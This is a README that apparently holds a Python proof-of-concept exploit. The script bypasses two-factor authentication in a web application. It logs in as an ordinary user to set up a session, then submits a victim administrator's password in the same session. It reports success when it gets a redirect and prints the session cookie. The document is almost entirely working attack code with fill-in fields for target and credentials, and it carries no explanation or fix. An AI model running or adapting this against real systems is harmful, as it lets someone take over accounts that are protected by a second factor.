README.md
Rendering markdown...
import requests
import re
###############################
## Author: Patrik Mayor #
###############################
########## FILL THIS ##########
url = "http://127.0.0.1/"
username = "[email protected]" # Username for the user without TFA
password = "normaluserpassword" # Password for the user without TFA
victim_username = "supersecureadminaccount" # Username for the user who has TFA enabled
victim_password = "supersecureadminaccountpassword" # Password for the user who has TFA enabled
###############################
proxy = {} # OPTIONAL proxy setting, for example: {"http":"127.0.0.1:8080"}
session = requests.Session()
def get_csrf_token():
response = session.get(url,proxies=proxy)
regex = r'"hidden" value="(.*?)">\'\)\.attr\(\''
csrf_search = re.search(regex, response.text, re.IGNORECASE)
if csrf_search:
csrf_token = csrf_search.group(1)
else:
print("Could not get CSRF token, exiting...")
exit()
return csrf_token
token=get_csrf_token()
session.post(url,data={"login_user":username,"pass_user":password,"csrf_token":token},proxies=proxy)
response = session.post(url,data={"login_user":victim_username,"pass_user":victim_password,"csrf_token":token},allow_redirects=False,proxies=proxy)
if response.status_code == 302:
print("PoC works!\n")
print("PHPSESSID="+session.cookies["PHPSESSID"])
else:
print("PoC does not work!")